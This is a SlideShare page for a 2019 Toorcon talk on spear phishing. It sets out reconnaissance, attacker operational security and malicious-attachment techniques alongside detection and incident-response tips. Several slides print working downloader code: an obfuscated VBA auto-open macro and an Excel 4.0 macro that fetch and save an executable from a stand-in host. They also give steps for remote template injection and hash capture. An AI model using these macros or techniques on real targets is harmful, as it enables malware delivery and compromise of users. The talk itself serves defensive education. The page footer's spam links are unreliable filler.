SlideShare a Scribd company logo

Toorcon - Purple Haze: The Spear Phishing Experience

Jesse Nebling
Jesse Nebling

Given at Toorcon 21 (2019), this presentation covers spear phishing from both an attacker's and defender's perspective.

Internet
1 of 19
Download to read offline
Purple Haze The SpearPhishing Experience feat. Jesse Nebling
Warning! Challenger approaching Jesse Nebling (@bashexplode) ● Internal Red Team ● Former Consultant ● Seattle, WA ● Windows exploitation ● “Purple Team” advocate ● Music production ● Stoked to be here A new foe has appeared!
During a Red Team operation, treat the attacker as a real Adversary.
What’s the point? ● Spear Phishing trial and error by both Adversaries and Blue Teams ● Pinpoint areas that may help tighten security and foster detection ● Give Blue Teams a glimpse of how Adversaries are plotting against them
Agenda ● Recon: Network & (Security) Tech Stack ● Adversarial OpSec: ○ Testing dropper malware ○ Image injection and text message notifications ○ One-time use tokens for phishing payloads ● Malicious Attachments: ○ Remote Template injection ○ VBA macros ○ Calendar phishing ○ Excel 4.0
Recon: Network & (Security) Tech Stack Typical OSINT Activities: ● whois ● Subdomain lookups ● Job openings for specific technologies ● Current employee job descriptions ● Social Media ● File metadata ● Public code repositories (e.g. github) ● Sites that share tech stacks (e.g. stackshare.io) ● Finding services that expose internal domain names ● Bouncing emails off of domains What the adversaries use this for: ● Create firewall rules to C2 servers ● Discover single factor authentication entry points ● Environmental keying ● Crafting malicious payloads ● Tailoring tradecraft Relevant Threat Actor: All Tool reference: https://github.com/bashexplode/pacifist-toolkit
MS Lync/Skype for Business services give base64 encoded internal NetBIOS domain name and FQDN when invalid credentials are entered: Bounced email uncovering internal host and domain name as well as email sandbox service: Recon: Network & (Security) Tech Stack Relevant Threat Actor: All Talk reference: The Weakest Lync (DerbyCon 2016)
Recon: Network & (Security) Tech Stack Areas of potential detection: ● Mass downloads of externally hosted files ● Emails being bounced against non-existent email accounts ● Bruteforcing single factor authentication pages Additional time cost to attacker: ● Egress points outside of networks registered under company’s name ● External covered fully by multifactor authentication ● Employees only have general job descriptions ● Job descriptions do not have specific technologies ● Metadata is wiped from all externally hosted files ● Tech stack is not publically shared ● Wildcard emails not allowed/Cannot bounce emails Relevant Threat Actor: All Tool reference: https://github.com/bashexplode/pacifist-toolkit
Adversarial OpSec: Testing Dropper Malware Relevant Threat Actor: All Assume Adversary is extremely dedicated. Take all information uncovered from reconnaissance and set up environment that mimics target’s tech stack. ● Discover methods to bypass AV and EDR tools ● Learn what techniques can be used to move laterally and escalate privileges without triggering alerts in the tech stack
Adversarial OpSec: Image Injection & Text Messaging To understand if document was opened and alert on potential blue team activity. ● Set up payload to reach out to a benign image hosted on the web server ○ Microsoft Word -> Insert Quick Parts -> Field -> IncludePicture -> Data not stored with document ● Any time the image is requested, send a text message for instant notification the payload has been open ● UNC path injection can also be used to obtain NTLMv2 hash and obtain alert Sample Python text message script: User Agent for Image GET Requests (Win 10): ● MS Word Office 365 Version 16.0.12026 ● MS Word Version 14.0.4760.1000.20344 Relevant Threat Actor: All import smtplib server = smtplib.SMTP( "smtp.gmail.com", 587 ) server.starttls() server.login( '<gmail_address>', '<gmail_password>' ) server.sendmail( '<from>', '<number>@vtext.com', 'PWND' ) Mozilla/4.0 (compatible; ms-office; MSOffice 16) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14) SMS email reference: https://bit.ly/32XiN4l
Adversarial OpSec: One-Time Use Tokens Used in combination with network firewall rules to help further tighten access control on malicious payloads. ● Set staging server with a database that tracks token usage ● Set up payload to reach out to a web page with a token ● If first (or second) time the token is used redirect to real payload ● Otherwise, redirect to benign page or benign payload ● Set up htaccess to redirect atypical user agents Relevant Threat Actor: All MITRE ATT&CK ID: T1192 Tool reference: https://github.com/bashexplode/otu-plz
Adversarial OpSec Areas of potential detection: ● Office/PDF reader processes with outbound network connectivity (HTTP(S), SMB, DNS) ● Malicious links in emails from non-trusted domains ● Previously mentioned GET requests with Office User Agent strings ● For the extremely curious, mass phishing campaigns with similar links and one-time use tokens can be used to track down an unclicked link to analyze a payload Incident Response and Defense tips: ● Stray from attempting to download payloads for analysis directly from malicious servers, htaccess redirection may be in place ● Assume adversary knows how to get around EDR tools and AV; after tuning these for lesser skilled adversaries focus on other anomalous activity such as low-level users using administrative command line utilities, lateral movement from HR department workstations, etc. ● Disable SMB outbound traffic Relevant Threat Actor: All MITRE ATT&CK ID: T1192
Malicious Attachments Overview Many email sandboxing/filtering solutions have cracked down on well-known payloads, and deny being sent to the recipient altogether. Dedicated adversaries will discover ways around these protections... Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0, Tropic Trooper MITRE ATT&CK ID: T1221
Malicious Attachments: Remote Template Injection Pre-staging technique to abstain from sending true payload and risk discovery of C2 infrastructure ● Create a document template that has a malicious macro in it ● Set up a burner staging server and host Word document template on a site that looks legitimate ● Create a benign document and edit XML file stored in Word document archive to point at the template file hosted ○ Document.docxword_relssettings.xml.rels ● Allows docx files to run macros and nothing malicious in document sent to user! Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0... MITRE ATT&CK ID: T1221 Remote Template Web Requests (Win 10): ● MS Word Office 2019 Version 16.0.12026 ● MS Word Version 14.0.4760.1000.20344 OPTIONS /payload-dir/ “Microsoft Office Word 2014” OPTIONS /payload-dir/ “Microsoft Office Word 2014” HEAD /payload-dir/Template.dotm "Microsoft Office Word 2014" OPTIONS /payload-dir/ “Microsoft Office Word 2014” GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; ms-office; MSOffice 16)" HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" OPTIONS /payload-dir/ “Microsoft Office Protocol Discovery” HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" X2 OPTIONS /payload-dir/Template.dotm "Microsoft-WebDAV-MiniRedir/10.0.17134" x4 PROPFIND /payload-dir/ “Microsoft-WebDAV-MiniRedir/10.0.17134” GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)" HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" x2 PROPFIND / “Microsoft-WebDAV-MiniRedir/10.0.17134”
Malicious Attachments: VBA Macros Classic Initial Access technique that has gone through many iterations ● WMI execution ● PowerShell download cradles ● Hiding variables in document properties ● Hiding variables in document XML ● Hiding variables in images/alternative text ● Reverse strings and replace characters ● Use words relevant to business as variables ● Stage the payload ● Execute outside of Office ancestry Relevant Threat Actors: APT12, APT19, APT28, FIN4... MITRE ATT&CK IDs: T1193, T1064 References: VBA Stomping - Advanced Malware Techniques (DerbyCon 2018) Sub Auto_Open(): downloadFile : XSL : PrivacyMode : End Sub Function PrivacyMode() ActiveSheet.Shapes(1).Visible = msoFalse End Function Function downloadFile() ' Replacement characters accounting = "#$" ' stage URL https://example.com/payload.jpg finance = "gp#$j.d#$aoly#$ap/m#$oc.e#$lpmax#$e//#$sp#$tth" ' where to save the downloaded file to - C:Users<user>Desktoptext.exe path = Environ("userprofile") & Application.PathSeparator & _ StrReverse(Replace(ex#$e.ts#$etpo#$tks#$eD, accounting, "") ' MSXML2.ServerXMLHTTP object Set Tuesday = CreateObject(StrReverse(Replace(PTTHLMXre#$vreS.2LMXSM, accounting, "") ' Creating and sending GET request for payload Tuesday.Open "GET", finance, False Tuesday.send If Tuesday.Status = 200 Then ' ADODB.Stream object Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "") January.Open January.Type = 1 January.Write Tuesday.ResponseBody January.Position = 0 January.SaveToFile path January.Close End Function ' Execution via XSL Function XSL() …SNIP… End Sub
Sample Excel 4.0 Macro: ● Insert... -> MS Excel 4.0 Macro ● Set Define Name for Cell A1 to “Auto_Open” User Agent for GET Requests (Win 10): ● MS Word Office 2019 Version 16.0.12026 ● ● MS Word Version 14.0.4760.1000.20344 Malicious Attachments: Excel 4.0/VBA Hybrid Relevant Threat Actor: TA505 Use old version of Excel macros to execute code that bypasses current detection tools ● Stan Hegt and team showed how to execute shellcode directly through Windows APIs and Excel 4.0 macro at DerbyCon ● I wanted to get away from two things with this method ○ Spawning as a child process of Excel ○ Giving away C2 infrastructure if doc is discovered ● Came up with my own attack flow with an Excel 4.0 downloader and VBA execution References: The MS Office Magic Show (DerbyCon 2018) =REGISTER("Urlmon","URLDownloadToFileA","JJCCJJ","URLD",,1,9) =URLD(,"https://example.com/logo.jpg","C:tempartifact.exe",0,) =WAIT(NOW() + "00:00:05") ‘VBA Execution Function =Taxes() =HALT() Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; wbx 1.0.0; Zoom 3.6.0) Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Malicious Attachments Points of discovery: ● Documents with outbound network connectivity ● VBA Scripts run from documents ● Execution as child process of Office product ● Old format versions of Office documents (<Office 2003) ● Calls to misused objects and functions in Office VBA macros: Incident Response tip: ● Sandbox payloads on a system representative of your domain without outbound connectivity (Environmental keying bypasses this) ● oledump.py to scrape VBA and Excel 4.0 (plugin_biff.py) macro content and view code Relevant Threat Actor: TA505 Tool reference: https://github.com/DidierStevens/DidierStevensSuite ○ C08AFD90-F2A1-11D1-8455-00A0C91F3880 ○ Microsoft.XMLDOM ○ Schedule.Service ○ ADODB.Stream ○ MSXML2.ServerXMLHTTP ○ ActiveSheet.Shapes(#).Visible = msoFalse ○ StrReverse ○ Replace
Malicious Attachments: Calendar Phishing Make a meeting invite notification pop up posing as important meeting with link of presentation material or conference software to view meeting ● Create a calendar event and include victim as attendee ● Attach a malicious link or document to invite ● Opt out of sending an invite email ● Shells? Points of discovery: ● Meetings originating from non-trusted domain email addresses ● Meetings that appear without an emailed meeting invite Incident Response tip: ● Get business to disable automatic adding of invitations to calendar Relevant Threat Actor: Scammers, me, Future Threat Actors probably
Thank you for playing! Thanks your time and attention. Questions?

Recommended

(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK BehaviorsStarted from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK BehaviorsJamieWilliams130
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...BlueHat Security Conference
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysisChong-Kuan Chen
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 

Recommended

(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK BehaviorsStarted from the Bottom: Exploiting Data Sources to Uncover ATT&CK Behaviors
Started from the Bottom: Exploiting Data Sources to Uncover ATT&CK BehaviorsJamieWilliams130
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S... BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...BlueHat Security Conference
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysisChong-Kuan Chen
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017J Hartig
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokensOWASP
 
Hunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezHunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezEC-Council
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_levelDeep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_levelgeeksec80
 
Taking browsers fuzzing new
Taking browsers fuzzing newTaking browsers fuzzing new
Taking browsers fuzzing newgeeksec80
 
Encryption
EncryptionEncryption
Encryptionshyam Tirkey
 
Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14mjos
 
Ravi kumar
Ravi kumarRavi kumar
Ravi kumarravi kumar
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!treyka
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityPratap Dangeti
 
Total E(A)gression defcon
Total E(A)gression defconTotal E(A)gression defcon
Total E(A)gression defconAlvaro Folgado Rueda
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsPriyanka Aash
 
Project in malware analysis:C2C
Project in malware analysis:C2CProject in malware analysis:C2C
Project in malware analysis:C2CFabrizio Farinacci
 
Addressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETAddressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETLicensingLive! - SafeNet
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 

More Related Content

What's hot

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017J Hartig
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokensOWASP
 
Hunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezHunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezEC-Council
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisAntonio Parata
 
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_levelDeep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_levelgeeksec80
 
Taking browsers fuzzing new
Taking browsers fuzzing newTaking browsers fuzzing new
Taking browsers fuzzing newgeeksec80
 

What's hot (9)

Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
 
[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens[OPD 2019] Attacking JWT tokens
[OPD 2019] Attacking JWT tokens
 
Hunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul AlvarezHunting Layered Malware by Raul Alvarez
Hunting Layered Malware by Raul Alvarez
 
HackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware AnalysisHackInBo2k16 - Threat Intelligence and Malware Analysis
HackInBo2k16 - Threat Intelligence and Malware Analysis
 
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_levelDeep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
Deep sec 2012_rosario_valotta_-_taking_browsers_fuzzing_to_the_next_(dom)_level
 
Taking browsers fuzzing new
Taking browsers fuzzing newTaking browsers fuzzing new
Taking browsers fuzzing new
 
Encryption
EncryptionEncryption
Encryption
 

Similar to Toorcon - Purple Haze: The Spear Phishing Experience

Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14mjos
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!treyka
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityPratap Dangeti
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsPriyanka Aash
 
Project in malware analysis:C2C
Project in malware analysis:C2CProject in malware analysis:C2C
Project in malware analysis:C2CFabrizio Farinacci
 
Addressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETAddressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETLicensingLive! - SafeNet
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Inception framework
Inception frameworkInception framework
Inception framework한익 주
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxGiuseppe Paterno'
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Is Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksIs Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksMaarten Van Horenbeeck
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...Felipe Prado
 
The Duqu 2.0: Technical Details
The Duqu 2.0: Technical DetailsThe Duqu 2.0: Technical Details
The Duqu 2.0: Technical DetailsKaspersky
 

Similar to Toorcon - Purple Haze: The Spear Phishing Experience (20)

Talk28oct14
Talk28oct14Talk28oct14
Talk28oct14
 
Ravi kumar
Ravi kumarRavi kumar
Ravi kumar
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in Cybersecurity
 
Total E(A)gression defcon
Total E(A)gression defconTotal E(A)gression defcon
Total E(A)gression defcon
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documents
 
Project in malware analysis:C2C
Project in malware analysis:C2CProject in malware analysis:C2C
Project in malware analysis:C2C
 
Addressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETAddressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NET
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Inception framework
Inception frameworkInception framework
Inception framework
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Is Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacksIs Troy Burning: an overview of targeted trojan attacks
Is Troy Burning: an overview of targeted trojan attacks
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
 
The Duqu 2.0: Technical Details
The Duqu 2.0: Technical DetailsThe Duqu 2.0: Technical Details
The Duqu 2.0: Technical Details
 

Recently uploaded

Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
Complet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled PersonComplet Documnetation for Smart Assistant Application for Disabled Person
Complet Documnetation for Smart Assistant Application for Disabled Personfurqan222004
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts servicesonalikaur4
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls10.pdfMature Call girls in Dubai +971563133746 Dubai Call girls
10.pdfMature Call girls in Dubai +971563133746 Dubai Call girlsstephieert
 
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Uttam Nagar Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
